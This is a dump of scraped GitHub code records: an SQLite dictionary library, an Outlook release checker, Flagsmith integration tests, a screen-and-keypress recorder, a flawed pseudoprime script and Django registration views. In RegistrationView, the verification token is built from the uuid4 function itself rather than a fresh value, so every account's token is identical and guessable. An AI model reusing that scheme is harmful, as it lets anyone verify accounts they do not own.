\"all\":\n            data.clear()\n            data = set([i for i in range(1, 21)])\n        else:\n            data = set()\n        continue\n\n    x = int(command[1])\n    command = command[0]\n    if command == \"add\":\n        data.add(x)\n    elif command == \"remove\":\n        if x in data: data.remove(x)\n    elif command == \"check\":\n        print(1 if x in data else 0)\n    elif command == \"toggle\":\n        if x in data:\n            data.remove(x)\n        else:\n            data.add(x)","repo_name":"jim4020key/problemsolving","sub_path":"집합.py","file_name":"집합.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13815041661","text":"\r\nimport os\r\nimport cPickle\r\nimport sqlite3\r\n\r\n__version__ = '0.5'\r\n\r\nMTN = 'DICTIONARY_TABLE' #MTN -> Magic Table Name\r\nsentinel = object()\r\nisfile = os.path.isfile\r\n\r\ndef sq_dict_open(filename, flag='w', mtn=MTN):\r\n    if flag == 'c':\r\n        flag = 'w'\r\n    return SqLiteDictionary(filename, flag, mtn)\r\n\r\ndef btopen(filename, flag='w', mtn=MTN):\r\n    if flag == 'c':\r\n        flag = 'w'\r\n    return OrderedSqLiteDictionary(filename, flag, mtn)\r\n\r\ndef shelve(filename, flag='w', mtn=MTN):\r\n    if flag == 'c':\r\n        flag = 'w'\r\n    return ShelveSqLiteDictionary(filename, flag, mtn)\r\n\r\ndef ashelve(filename, flag='w', mtn=MTN):\r\n    if flag == 'c':\r\n        flag = 'w'\r\n    return ArbitrarySqLiteDictionary(filename, flag, mtn)\r\n\r\ndef _explain(db, q, args):\r\n    _row = ['addr', 'opcode', 'p1', 'p2', 'p3', 'p4', 'p5', 'comment']\r\n    rows = list(map(str, i) for i in db.execute(\"EXPLAIN \"+q, args))\r\n    rows.insert(0, _row)  # header row (`row` is undefined at this point)\r\n    for i, row in enumerate(rows):\r\n        while len(row) != len(_row):\r\n            row.append('')\r\n    cw = [max(map(len, i)) for i in zip(*rows)]\r\n    rows.insert(1, [i*'-' for i in cw])\r\n    fstring = ' '.join('%%%is'%i for i in cw)\r\n    return '\n'.join(fstring%tuple(i) for i in rows)\r\n\r\n'''\r\nflag\tmeaning\r\n----\t-------\r\nr\t\tread-only\r\nw\t\tread-write\r\n'''\r\n\r\nclass SqLiteDictionary(object):\r\n    __slots__ = '_flag', '_db', '_cursor', '_mtn', 'autosync', '_orderby'\r\n    def __init__(self, filename, flag, mtn, autosync=0):\r\n        # check flag\r\n        if flag not in ('r', 'w'):\r\n            raise ValueError(\r\n                \"flag argument must be 'r' or 'w'; not %r\"%(flag,))\r\n        self._flag = flag\r\n\r\n        self._mtn = mtn\r\n\r\n        # check whether the file exists\r\n        if filename != ':memory:':\r\n            if self._flag == 'r':\r\n                os.stat(filename)\r\n        elif self._flag == 'r':\r\n            # an in-memory database cannot be opened read-only: it has no\r\n            # pre-existing contents\r\n            raise IOError(\"File not found\")\r\n\r\n        # open the db and check for the table\r\n        self._db = sqlite3.connect(filename)\r\n        for name, 
in self._db.execute(\"SELECT name FROM sqlite_master\"):\r\n            if name == self._mtn:\r\n                # dictionary table already exists; nothing to create\r\n                break\r\n        else:\r\n            if self._flag == 'w':\r\n                self._create_table()\r\n            else:\r\n                raise ValueError(\r\n                    \"Dictionary table %s does not exist within sqlite database\"%\r\n                    self._mtn)\r\n        self._cursor = None\r\n        self.autosync = autosync\r\n        self._orderby = ' ORDER BY ROWID '\r\n\r\n#------------------------------- internal bits -------------------------------\r\n    def _create_table(self):\r\n        self._db.execute('''\r\n            CREATE TABLE %s (\r\n                ROWKEY BLOB PRIMARY KEY,\r\n                ROWVAL BLOB);'''%self._mtn)\r\n\r\n    @staticmethod\r\n    def _check_key(key):\r\n        if type(key) not in (str, buffer):\r\n            raise ValueError(\r\n                \"Can only use str instances as keys, not %r\"%(type(key),))\r\n        return buffer(key)\r\n\r\n    @staticmethod\r\n    def _check_value(value):\r\n        if type(value) not in (str, buffer):\r\n            raise ValueError(\r\n                \"Can only use str instances as values, not %r\"%(type(value),))\r\n        return buffer(value)\r\n\r\n    @staticmethod\r\n    def _ke(key):\r\n        return KeyError(\"Key %r not found\"%(key,))\r\n\r\n    @classmethod\r\n    def _ro(cls):\r\n        return TypeError(\r\n            \"Read-only instance of %s does not support item assignment\"%\r\n            (cls.__name__,))\r\n\r\n#----------------------- standard sequence operations ------------------------\r\n    def __len__(self):\r\n        for length, in self._db.execute(\"SELECT count(1) FROM %s\"%self._mtn):\r\n            return length\r\n        # should never get here\r\n\r\n    def __iter__(self):\r\n        QUERY = \"SELECT ROWKEY FROM %s %s\"%(self._mtn, self._orderby)\r\n        for rowkey, in self._db.execute(QUERY):\r\n            yield str(rowkey)\r\n\r\n    def __contains__(self, key):\r\n        key = self._check_key(key)\r\n        try:\r\n            self[key]\r\n        except KeyError:\r\n            return 0\r\n        return 1\r\n\r\n    def __getitem__(self, key):\r\n        key = self._check_key(key)\r\n        QUERY = \"SELECT ROWVAL FROM %s WHERE ROWKEY = ?\"%self._mtn\r\n        for rowval, in self._db.execute(QUERY, (key,)):\r\n            return str(rowval)\r\n        raise self._ke(key)\r\n\r\n    def __setitem__(self, key, value):\r\n        if self._flag == 'r':\r\n            raise self._ro()\r\n        key = self._check_key(key)\r\n        value = self._check_value(value)\r\n        QUERY = \"REPLACE INTO %s (ROWKEY, ROWVAL) VALUES (?, ?)\"%self._mtn\r\n        self._db.execute(QUERY, (key, value))\r\n        if self.autosync:\r\n            self.sync()\r\n\r\n    def __delitem__(self, key):\r\n        if self._flag == 'r':\r\n            raise self._ro()\r\n        key = self._check_key(key)\r\n        QUERY = \"DELETE FROM %s WHERE ROWKEY = ?\"%self._mtn\r\n        # execute() returns a cursor; its rowcount tells us whether a row was deleted\r\n        if self._db.execute(QUERY, (key,)).rowcount < 1:\r\n            raise self._ke(key)\r\n        if self.autosync:\r\n            self.sync()\r\n\r\n#---------------------------- dictionary interface ----------------------------\r\n    has_key = __contains__\r\n\r\n    def get(self, key, default=None):\r\n        try:\r\n            return self[key]\r\n        except KeyError:\r\n            return default\r\n\r\n    def pop(self, key, default=sentinel):\r\n        try:\r\n            default = self[key]\r\n            del self[key]\r\n        except KeyError:\r\n            if default is sentinel:\r\n                raise\r\n        return default\r\n\r\n    def popitem(self, key, default=sentinel):\r\n        value = self.pop(key, default)\r\n        return key, value\r\n\r\n    def setdefault(self, key, default):\r\n        value = self.get(key, sentinel)\r\n        if value is sentinel:\r\n            self[key] = value = default\r\n        return value  # the stored value, or the freshly-set default\r\n\r\n    # keys\r\n    def keys(self):\r\n        return Keys(self)\r\n\r\n    iterkeys = keys\r\n\r\n    # values\r\n    def values(self):\r\n        return Values(self)\r\n\r\n    itervalues = values\r\n\r\n    def _itervalues(self):\r\n        for i,j in self._iteritems():\r\n            yield j\r\n\r\n    # items\r\n    def items(self):\r\n        return 
Items(self)\r\n\r\n iteritems = items\r\n\r\n def _iteritems(self):\r\n QUERY = \"SELECT ROWKEY, ROWVAL FROM %s %s\"%(self._mtn, self._orderby)\r\n for i,j in self._db.execute(QUERY):\r\n yield str(i), str(j)\r\n\r\n # update\r\n def update(self, other):\r\n if hasattr(other, 'iteritems'):\r\n other = other.iteritems()\r\n elif hasattr(other, 'items'):\r\n other = other.items()\r\n for i,j in other:\r\n self[i] = j\r\n\r\n # clear\r\n def clear(self):\r\n self._db.execute(\"DELETE FROM %s\"%self._mtn)\r\n\r\n def _slowclear(self):\r\n self._db.execute(\"DELETE FROM %s WHERE 1\"%self._mtn)\r\n\r\n#---------------------------- dbm-like interface -----------------------------\r\n def sync(self):\r\n self._db.commit()\r\n\r\n def close(self):\r\n if self._db is not None:\r\n self.sync()\r\n self._cursor = None\r\n self._db.close()\r\n self._db = None\r\n\r\nclass OrderedSqLiteDictionary(SqLiteDictionary):\r\n def __init__(self, filename, flag, mtn, autosync=0):\r\n SqLiteDictionary.__init__(self, filename, flag, mtn, autosync)\r\n self._orderby = \" ORDER BY ROWKEY \"\r\n\r\n#---------------------- bsddb.btree-compatilble additions ----------------------\r\n def _sc(self, c, x):\r\n if c is None:\r\n raise KeyError(\"%s key not found\"%x)\r\n c = tuple(str(i) for i in c)\r\n self._cursor = c\r\n return c\r\n\r\n def _step(self, key, cmp, dire):\r\n key = self._check_key(key)\r\n o = ''\r\n if '<' in cmp:\r\n o = 'DESC'\r\n c = None\r\n QUERY = (\"SELECT ROWKEY, ROWVAL FROM %s WHERE ROWKEY %s ? %s %s LIMIT 1\"\r\n %(self._mtn, cmp, self._orderby, o))\r\n for c in self._db.execute(QUERY, (key,)):\r\n break\r\n return self._sc(c, dire)\r\n\r\n def set_location(self, key):\r\n return self._step(key, '>=', 'Usable')\r\n\r\n def first(self):\r\n return self._step('', '>=', 'First')\r\n\r\n def next(self):\r\n if self._cursor is None:\r\n return self.first()\r\n return self._step(self._cursor[0], '>', 'Next')\r\n\r\n def last(self):\r\n for c, in self._db.execute(\"SELECT MAX(ROWKEY) FROM %s\"%self._mtn):\r\n return self._step(c, '<=', 'Last')\r\n return self._sc(None, 'Last')\r\n\r\n def previous(self):\r\n if self._cursor is None:\r\n return self.last()\r\n return self._step(self._cursor[0], '<', 'Previous')\r\n\r\nclass ShelveSqLiteDictionary(SqLiteDictionary):\r\n # put the heavy lifting for ArbitrarySqLiteDictionary here\r\n _allowed_keys = (str, buffer)\r\n @classmethod\r\n def _check_key(cls, key):\r\n if type(key) not in cls._allowed_keys:\r\n raise ValueError(\r\n \"Can only use (%s) instances as keys, not %r\"%\r\n (\", \".join(i.__name__ for i in cls._allowed_keys), type(key)))\r\n if type(key) is str:\r\n return buffer(key)\r\n return key\r\n\r\n # dump arbitrary data\r\n @staticmethod\r\n def _check_value(value):\r\n return buffer(cPickle.dumps(value))\r\n\r\n # load the data\r\n def __getitem__(self, key):\r\n return cPickle.loads(\r\n super(ShelveSqLiteDictionary, self).__getitem__(key))\r\n\r\n # fix the iterable keys\r\n def __iter__(self):\r\n QUERY = \"SELECT ROWKEY FROM %s %s\"%(self._mtn, self._orderby)\r\n for rowkey, in self._db.execute(QUERY):\r\n if type(rowkey) is buffer:\r\n yield str(rowkey)\r\n else:\r\n yield rowkey\r\n\r\n # fix the iterable values\r\n def iteritems(self):\r\n QUERY = \"SELECT ROWKEY, ROWVAL FROM %s %s\"%(self._mtn, self._orderby)\r\n for i,j in self._db.execute(QUERY):\r\n if type(i) is buffer:\r\n i = str(i)\r\n yield i, cPickle.loads(str(j))\r\n\r\nclass ArbitrarySqLiteDictionary(ShelveSqLiteDictionary):\r\n # only allow immutables as keys\r\n 
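# (a mutable key could change after being stored and no longer match its\r\n    # saved PRIMARY KEY, silently breaking lookups)\r\n    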
_allowed_keys = (str, buffer, unicode, int, float, type(None))\r\n\r\nclass Keys(object):\r\n # for Python 3.0's view object implementation\r\n __slots__ = '_parent',\r\n def __init__(self, parent):\r\n self._parent = parent\r\n\r\n def __len__(self):\r\n return len(self._parent)\r\n\r\n def __contains__(self, key):\r\n return key in self._parent\r\n\r\n def __iter__(self):\r\n return iter(self._parent)\r\n\r\n # view set operations\r\n def __and__(self, other):\r\n if type(other) not in (Keys, Items):\r\n return set(self) & set(other)\r\n if len(other) < len(self):\r\n self, other = other, self\r\n s = set()\r\n for i in self:\r\n if i in other:\r\n s.add(i)\r\n return s\r\n\r\n def __or__(self, other):\r\n s = set(self)\r\n s.update(other)\r\n return s\r\n\r\n def __sub__(self, other):\r\n if type(other) not in (Keys, Items):\r\n s = set(self)\r\n return s - set(other)\r\n s = set()\r\n for i in self:\r\n if i not in other:\r\n s.add(i)\r\n return s\r\n\r\n def __rsub__(self, other):\r\n if type(self) not in (Keys, Items):\r\n s = set(other)\r\n return s - set(self)\r\n s = set()\r\n for i in other:\r\n if i not in self:\r\n s.add(i)\r\n return s\r\n\r\n def __xor__(self, other):\r\n if (type(self) not in (Keys, Items)) or (type(other) not in (Keys, Items)):\r\n return set(self) ^ set(other)\r\n return (self-other) | (other-self)\r\n\r\nclass Values(Keys):\r\n def __contains__(self, value):\r\n return value in iter(self)\r\n def __iter__(self):\r\n return self._parent._itervalues()\r\n\r\nclass Items(Keys):\r\n def __contains__(self, kv_pair):\r\n if type(kv_pair) is not tuple or len(kv_pair) != 2:\r\n raise ValueError(\"Need 2-tuple to check item containment\")\r\n return self._parent.get(kv_pair[0], sentinel) == kv_pair[1]\r\n def __iter__(self):\r\n return self._parent._iteritems()\r\n","repo_name":"amuralle/pygr","sub_path":"contrib/benchmark/sq_dict.py","file_name":"sq_dict.py","file_ext":"py","file_size_in_byte":12241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37577501060","text":"\"\"\"\nCoordinates checking data releases for sites due, according to Outlook calendar.\n\nRun this script at the beginning of the day and it will end itself after\nchecking the last event in Outlook calendar.\n\"\"\"\nimport time\nimport json\nfrom datetime import datetime, timedelta\n\nimport schedule\n\nfrom data_releases import outlook, site_checking\n \n \ndef coordinate(event_details, tzone):\n \"\"\"\n If check is successful (or throws error) alert via Outlook Email and remove\n Outlook Calendar entry\n \"\"\"\n # Should {url,text_template,xpath} be stored somewhere other than the event?\n updated, response_info = site_checking.check_date_str(\n event_details['url'],\n event_details['text_template'],\n event_details['date_str'],\n xpath=event_details['xpath']\n )\n if updated:\n # detected a data release\n msg = \"\"\"\n Data released for \"{title}\" with date \"{date_str}\"\n \n Download from: {url}\n \n :^)\n \"\"\".format(**event_details)\n outlook.email_alert(msg, subject=\"Data Release Detected\")\n # remove calendar entry -- DISABLED FOR TESTING\n # outlook.cancel_event(covid_calendar, event_details['ical_uid'])\n # cancel retry-jobs\n schedule.clear(event_details['ical_uid'])\n elif len(schedule.get_jobs(event_details['ical_uid'])) == 0:\n # no more retries scheduled, move calendar event to next weekday\n if datetime.now(tzone).strftime('%A') == \"Friday\":\n days_to_add = 3\n else:\n days_to_add = 1\n 
outlook.move_event(covid_calendar, event_details['ical_uid'],\n                           days=days_to_add)\n    elif updated is None:\n        # error was thrown when checking site\n        msg = \"\"\"\n        Error was thrown when checking data release for {event_name}.\n        (This event will not be automatically retried.)\n        \n        Error message: {response_info}\n        \n        Full event details:\n        {event_details}\n        \"\"\".format(event_details=event_details,\n                   response_info=response_info,\n                   event_name=event_details['title'])\n        outlook.email_alert(msg, subject=\"Data Release Error\")\n        # abandon retries for this event\n        schedule.clear(event_details['ical_uid'])\n\n\ndef check_for_elapsed_events(next_day_info, tzone):\n    # The events are sorted by datetime, so the first element is the next event\n    next_event = next_day_info[0]\n    next_dt = datetime.fromisoformat(next_event['release_dt'])\n    if next_dt < datetime.now(tzone):\n        # Event has elapsed so should be put on \"active\" status\n        schedule.every(5).minutes.do(coordinate,\n                                     event_details=next_event,\n                                     tzone=tzone) \\n                .until(datetime.now(tzone) + timedelta(minutes=30)) \\n                .tag(next_event['ical_uid'])\n        # ...and removed from \"pending\"\n        if len(next_day_info) > 1:\n            next_day_info = next_day_info[1:]\n        else:\n            # no more events to check for\n            schedule.clear('main_job')\n    \n    # return the remaining pending events (`next_day` was an undefined name here)\n    return next_day_info\n\n\nif __name__ == \"__main__\":\n    covid_calendar = outlook.get_covid_calendar()\n    \n    next_day = outlook.get_next_info(covid_calendar, 1)\n    output = {\n        'next_dt': next_day[0]['release_dt'] if len(next_day) > 0 else None,\n        'calendar_id': covid_calendar.calendar_id,\n        'meta': \"\"\"\n        Gives datetimes according to \"{tzone}\" timezone ({tzname}).\n        \"\"\".format(tzone=outlook.DEFAULT_TZONE,\n                   tzname=outlook.DEFAULT_TZONE.tzname(datetime.now())),\n        'full_info': next_day\n    }\n    with open('../data/next_day.json', 'w') as f:\n        json.dump(output, f)\n    \n    # Start running\n    schedule.every(15).minutes.do(check_for_elapsed_events,\n                                  next_day_info=next_day,\n                                  tzone=outlook.DEFAULT_TZONE) \\n            .tag('main_job')\n    \n    while len(schedule.get_jobs()) > 0:\n        schedule.run_pending()\n        time.sleep(1)\n","repo_name":"xaviermiles/automation","sub_path":"data_releases/daily_run.py","file_name":"daily_run.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9864090705","text":"from helper import num_bits, max_robot_add, int_to_bin_props\n\n\nadder_formula = \"\"\nfor i in range(2**num_bits):\n    l = int_to_bin_props(i, \"p\", False)\n    clause = \"(!( \"  # one clause per counter value (avoids shadowing builtin str)\n    for s in l:\n        clause = clause + \"(\" + s + \") & \"\n    clause = clause[:-3]\n    clause = clause + \" ) | ( (\"\n    for j in range(max_robot_add):\n        res = (i+j) % (2**num_bits)\n        l = int_to_bin_props(res, \"p\", True)\n        for s in l:\n            clause = clause + \"(\" + s + \") & \"\n        clause = clause[:-3] + \" ) | (\"\n    clause = clause[:-4] + \")) & \"\n    adder_formula = adder_formula + clause\nadder_formula = adder_formula[:-3]\n\n# goal_formula = \"\"\n# for i in range(num_bits):\n#     goal_formula = goal_formula + \"(x{} = y{}) & \".format(i,i)\n# goal_formula = goal_formula[:-3]\n\n# formula = \"(G(\"+adder_formula+\")) & (F(\"+goal_formula+\"))\"\n\nformula = \"(G(\"+adder_formula+\")) & (F(\\\"robotturnwin\\\" | \\\"humanturnwin\\\"))\"\n\n\nprint(\"Pmax =? 
[\" + formula + \"];\")","repo_name":"andrewmw94/gandalf_2020_experiments","sub_path":"double_counter/print_formula.py","file_name":"print_formula.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33306555698","text":"import json\nfrom unittest.case import TestCase\n\nimport pytest\nfrom django.urls import reverse\nfrom rest_framework import status\nfrom rest_framework.test import APIClient\n\nfrom environments.models import Environment\nfrom integrations.new_relic.models import NewRelicConfiguration\nfrom organisations.models import Organisation, OrganisationRole\nfrom projects.models import Project\nfrom util.tests import Helper\n\n\n@pytest.mark.django_db\nclass NewRelicConfigurationTestCase(TestCase):\n def setUp(self):\n self.client = APIClient()\n user = Helper.create_ffadminuser()\n self.client.force_authenticate(user=user)\n\n self.organisation = Organisation.objects.create(name=\"Test Org\")\n user.add_organisation(\n self.organisation, OrganisationRole.ADMIN\n ) # admin to bypass perms\n\n self.project = Project.objects.create(\n name=\"Test project\", organisation=self.organisation\n )\n self.environment = Environment.objects.create(\n name=\"Test Environment\", project=self.project\n )\n self.list_url = reverse(\n \"api-v1:projects:integrations-new-relic-list\", args=[self.project.id]\n )\n\n def test_should_create_new_relic_config_when_post(self):\n # Given setup data\n data = {\n \"base_url\": \"http://test.com\",\n \"api_key\": \"key-123\",\n \"app_id\": \"app-123\",\n }\n\n # When\n response = self.client.post(\n self.list_url,\n data=json.dumps(data),\n content_type=\"application/json\",\n )\n\n # Then\n assert response.status_code == status.HTTP_201_CREATED\n # and\n assert NewRelicConfiguration.objects.filter(project=self.project).count() == 1\n\n def test_should_return_BadRequest_when_duplicate_new_relic_config_is_posted(self):\n # Given\n NewRelicConfiguration.objects.create(\n base_url=\"http://test.com\",\n api_key=\"key-123\",\n app_id=\"app-123\",\n project=self.project,\n )\n data = {\n \"base_url\": \"http://test.com\",\n \"api_key\": \"key-123\",\n \"app_id\": \"app-123\",\n }\n\n # When\n response = self.client.post(\n self.list_url,\n data=json.dumps(data),\n content_type=\"application/json\",\n )\n\n # Then\n assert response.status_code == status.HTTP_400_BAD_REQUEST\n assert NewRelicConfiguration.objects.filter(project=self.project).count() == 1\n\n #\n def test_should_update_configuration_when_put(self):\n # Given\n config = NewRelicConfiguration.objects.create(\n base_url=\"http://test.com\",\n api_key=\"key-123\",\n app_id=\"app-123\",\n project=self.project,\n )\n\n api_key_updated = \"new api\"\n app_id_updated = \"new app\"\n data = {\n \"base_url\": config.base_url,\n \"api_key\": api_key_updated,\n \"app_id\": app_id_updated,\n }\n\n # When\n url = reverse(\n \"api-v1:projects:integrations-new-relic-detail\",\n args=[self.project.id, config.id],\n )\n response = self.client.put(\n url,\n data=json.dumps(data),\n content_type=\"application/json\",\n )\n config.refresh_from_db()\n\n # Then\n assert response.status_code == status.HTTP_200_OK\n assert config.api_key == api_key_updated\n assert config.app_id == app_id_updated\n\n def test_should_return_new_relic_config_list_when_requested(self):\n # Given - set up data\n\n # When\n response = self.client.get(self.list_url)\n\n # Then\n assert response.status_code == status.HTTP_200_OK\n\n def 
test_should_remove_configuration_when_delete(self):\n        # Given\n        config = NewRelicConfiguration.objects.create(\n            base_url=\"http://test.com\",\n            api_key=\"key-123\",\n            app_id=\"app-123\",\n            project=self.project,\n        )\n        # When\n        url = reverse(\n            \"api-v1:projects:integrations-new-relic-detail\",\n            args=[self.project.id, config.id],\n        )\n        res = self.client.delete(url)\n\n        # Then\n        assert res.status_code == status.HTTP_204_NO_CONTENT\n        # and\n        assert not NewRelicConfiguration.objects.filter(project=self.project).exists()\n","repo_name":"Flagsmith/flagsmith","sub_path":"api/integrations/new_relic/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":4434,"program_lang":"python","lang":"en","doc_type":"code","stars":3272,"dataset":"github-code","pt":"31"} +{"seq_id":"13632202532","text":"from django.db import models\nfrom user.models import User\n\nclass Categories(models.Model):\n\n    category_name = models.CharField(max_length=100)\n    description = models.CharField(max_length=500)\n    is_active = models.BooleanField(default=True)\n    created_at = models.DateTimeField(auto_now_add=True)\n    updated_at = models.DateTimeField(auto_now=True)\n\n    class Meta:\n        verbose_name_plural = \"categories\"\n\n    def __str__(self):\n        return str(self.category_name)","repo_name":"sanket8088/drf-ecommerce","sub_path":"ecommerce/products/models/categories.py","file_name":"categories.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6018259579","text":"import time\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef sieve_of_eratosthenes(limit):\r\n    primes = [True] * (limit + 1)\r\n    primes[0] = primes[1] = False\r\n    for num in range(2, int(limit**0.5) + 1):\r\n        if primes[num]:\r\n            for multiple in range(num * num, limit + 1, num):\r\n                primes[multiple] = False\r\n    return [num for num, is_prime in enumerate(primes) if is_prime]\r\n\r\n\r\ndef is_psp(num, base, prime):\r\n    exp = num - 1\r\n    while exp % prime != 0:\r\n        exp += num - 1\r\n    return pow(base, exp // prime, num) == 1\r\n\r\n\r\ndef pomerance_algorithm(limit):\r\n    primes = sieve_of_eratosthenes(limit)\r\n    result = []\r\n    for num in range(2, limit):\r\n        is_psp_2 = all(is_psp(num, 2, prime) for prime in primes)\r\n        is_psp_3 = all(is_psp(num, 3, prime) for prime in primes)\r\n        if is_psp_2 and is_psp_3:\r\n            result.append(num)\r\n    return result\r\n\r\n\r\nlimits = [10**6, 10**8]  # different limits for execution-time analysis\r\n\r\nfor i in limits:\r\n    psp_numbers = pomerance_algorithm(i)\r\n    print(f\"PSP numbers less than {i}: {psp_numbers}\")\r\nexecution_times = []\r\n\r\nfor limit in limits:\r\n    start_time = time.time()\r\n    psp_numbers = pomerance_algorithm(limit)\r\n    end_time = time.time()\r\n    execution_times.append(end_time - start_time)\r\n    print(f\"PSP numbers less than {limit}: {len(psp_numbers)}\")\r\n\r\n# Plot the execution times\r\nplt.figure(figsize=(8, 6))\r\nplt.plot(limits, execution_times, marker='o', color='b', linestyle='-', linewidth=2, markersize=8)\r\nplt.xlabel('Number Limit')\r\nplt.ylabel('Execution Time (seconds)')\r\nplt.title('Execution Time vs. 
Number Limit')\r\nplt.grid(True)\r\nplt.show()\r\n","repo_name":"markiriy/pomerance-algorithm","sub_path":"pomerances.py","file_name":"pomerances.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10584114939","text":"import cv2\nimport numpy as np\nimport pyautogui\nimport keyboard  # needed for key-state queries (assumes the `keyboard` package is installed)\nimport time\n\n# Define the codec and create VideoWriter object\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\nout = cv2.VideoWriter('output.avi', fourcc, 20.0, (1920, 1080))\n\n# Define a function to get the pressed keys\ndef get_pressed_keys():\n    keys = []\n    for key_name in [\"left\", \"right\", \"up\", \"down\", \"space\"]:\n        # pyautogui.keyDown() *presses* a key rather than reporting its state,\n        # so the original check never worked; the keyboard package's\n        # is_pressed() is used instead\n        if keyboard.is_pressed(key_name):\n            keys.append(key_name)\n    return keys\n\n# Define the main function\ndef record_game():\n    # Wait for 5 seconds before starting\n    time.sleep(5)\n    while True:\n        # Take a screenshot of the screen\n        screenshot = pyautogui.screenshot()\n        # Convert the screenshot to an array and resize it\n        frame = np.array(screenshot)\n        frame = cv2.resize(frame, (1920, 1080))\n        # Get the pressed keys\n        keys = get_pressed_keys()\n        # Write the keys on the frame\n        text = \"Keys: \" + \" \".join(keys)\n        cv2.putText(frame, text, (50, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2)\n        # Write the frame to the video\n        out.write(frame)\n        # Exit the loop if the 'q' key is pressed\n        if cv2.waitKey(1) == ord('q'):\n            break\n\n# Call the main function\nrecord_game()\n\n# Release everything\nout.release()\ncv2.destroyAllWindows()\n","repo_name":"Siranial/PlayAI","sub_path":"Scrapped/Data_Collection/Frame_Capture/gpt_framecap.py","file_name":"gpt_framecap.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35590788114","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n    Extra form field:\n\n    JSONField\n\"\"\"\n\nimport json\n\nfrom django.forms import Field, ValidationError\n\n\nclass JSONField(Field):\n    \"\"\"\n    Accepts a JSON string as input and converts it into a Python object.\n    \"\"\"\n\n    def to_python(self, value):\n        \"\"\"\n        Parses the incoming JSON string and returns the resulting Python\n        object. Returns None for empty values; raises ValidationError if the\n        string is not valid JSON.\n        \"\"\"\n
Ensures that there are no more\n than max_digits in the number, and no more than decimal_places digits\n after the decimal point.\n \"\"\"\n #django.core.serializers.json.DjangoJSONEncoder\n\n if value in self.empty_values:\n return None\n\n try:\n return json.loads(value)\n except Exception as e:\n raise ValidationError(repr(e), code='invalid')\n","repo_name":"Alex-vz/django-easy-vue2","sub_path":"easy_vue/dj_form.py","file_name":"dj_form.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30428745451","text":"from django.shortcuts import render, redirect\nfrom django.views.generic import TemplateView\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.views.generic.edit import CreateView\nfrom django.urls import reverse_lazy\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib import messages\nfrom .models import Contact, Profile\nfrom django.urls import reverse\nfrom django.core.validators import validate_email\nfrom django.core.exceptions import ValidationError\nfrom django.core.mail import send_mail\nfrom django.http import JsonResponse\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.conf import settings\nfrom django.core.mail import send_mail, EmailMessage\nfrom django.shortcuts import render\nfrom django.template.loader import render_to_string\nimport json\nimport uuid\n\n####################################################\n\n\nclass MainView(TemplateView):\n template_name = 'emnosys/main.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['css_file'] = 'styles.css'\n return context\n\n\n######################################################\n\n\ndef RegistrationView(request):\n if request.method == \"POST\":\n username = request.POST['username']\n email = request.POST['email']\n password1 = request.POST['password1']\n\n myuser = User.objects.create_user(username, email, password1)\n myuser.save()\n\n profile_obj = Profile.objects.create(user=myuser, token=str(uuid.uuid4))\n profile_obj.save()\n\n SendVerificationEmailView(email, profile_obj.token)\n\n return redirect('/token')\n\n return render(request, 'emnosys/registration.html', {'request': request})\n\n\n###############################################\n\n\ndef TokenSendView (request):\n return render(request , 'emnosys/send_token.html')\n\n\n###############################################\n\n\ndef VerificationView(request, token):\n try:\n profile_obj = Profile.objects.filter(token=token).first()\n if profile_obj:\n profile_obj.is_verified = True\n profile_obj.save()\n messages.success(request, 'Your account has been verified')\n return redirect('/signin')\n else:\n\n messages.error(request, 'Invalid token or profile not found')\n return redirect('/error')\n except Exception as e:\n\n print(e)\n return redirect('/error')\n\n\n###################################################\n\n\ndef SendVerificationEmailView(email,token):\n subject = \"Your account needs to be verified\"\n message = 'Hi, use that link to verify your account \\n http://127.0.0.1:8000/verify/' + token\n email_from = settings.EMAIL_HOST_USER\n recipient_list = [email]\n send_mail(subject, message , email_from 
\n\n\n###############################################\n\n\ndef SigninView(request):\n\n    if request.method == 'POST':\n        username = request.POST['username']\n        password1 = request.POST['pass1']\n\n        user = authenticate(username=username, password=password1)\n\n        if user is not None:\n            login(request, user)\n            return render(request, \"emnosys/main.html\")\n        else:\n            return redirect('signin')\n    return render(request, \"emnosys/signin.html\")\n\n################################################\n\ndef SignoutView(request):\n    logout(request)\n    return redirect('home')\n\n######################################################\n\n\nclass PersonalPageView(TemplateView):\n    template_name = 'emnosys/personalpage.html'\n\n    def get_context_data(self, **kwargs):\n        context = super().get_context_data(**kwargs)\n        context['css_file'] = 'styles.css'\n        return context\n\n####################################################\n\n@login_required\ndef ContactCreateView(request):\n    if request.method == 'POST':\n        username = request.POST.get('username')\n        message = request.POST.get('textarea')\n        email = request.POST.get('email')\n        if not all([username, message, email]):\n            return render(request, 'emnosys/addcontacts.html')\n        try:\n            validate_email(email)\n        except ValidationError:\n            return render(request, 'emnosys/addcontacts.html')\n        contact = Contact(username=username, message=message, email=email, contactowner=request.user)\n        contact.save()\n        return HttpResponseRedirect(reverse('personalpage'))\n    return render(request, 